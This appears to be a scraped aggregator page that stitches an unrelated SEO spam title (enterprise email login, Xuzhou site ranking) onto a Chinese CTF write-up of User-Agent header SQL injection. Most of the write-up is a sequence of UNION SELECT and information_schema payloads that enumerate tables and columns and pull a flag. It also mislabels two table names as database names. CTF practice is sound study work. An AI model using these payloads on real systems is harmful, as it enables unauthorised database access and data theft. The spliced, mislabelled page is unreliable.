当前位置：首页 > news >正文

网易企业邮箱登录登录入口徐州企业网站排名优化

news 2025/12/20 22:33:56

网易企业邮箱登录登录入口,徐州企业网站排名优化,爱站工具包的模块有哪些,企业网站源码安装教程目录判断是否存在注入判断字段数量判断回显位置查询数据库名查询数据库下的表名查询表中的字段名查询字段名下的数据由于本关是UA注入#xff0c;就不浪费时间判断是什么注入了#xff0c;在该页面使用 burp工具抓包#xff0c;修改User-Agent#xff0c;加… 目录判断是否存在注入判断字段数量判断回显位置查询数据库名查询数据库下的表名查询表中的字段名查询字段名下的数据由于本关是UA注入就不浪费时间判断是什么注入了在该页面使用 burp工具抓包修改User-Agent加上SQL语句然后放包就可以在题目页面显示结果判断是否存在注入 1 and 11 1 and 12 发现页面报错判断字段数量 1 order by 1 1 order by 2 1 order by 3 发现页面报错可以确定字段数量是2 判断回显位置 -1 union select 1,2 发现两个字段都可以回显查询数据库名 -1 union select l,group_concat(schema_name) from information_schema.schemata 查询数据库下的表名 -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema database() 发现两个数据库名olqgtrtcwu和news 查询表中的字段名我们先查询olqgtrtcwu表 -1 union select 1,group_concat(column_name) from information_schema.columns where table_schema database() and table_name olqgtrtcwu 发现了字段名tdvmulycem 查询字段名下的数据 -1 union select 1,group_concat(tdvmulycem) from olqgtrtcwu 发现了本题的flag

查看全文

http://www.pierceye.com/news/871913/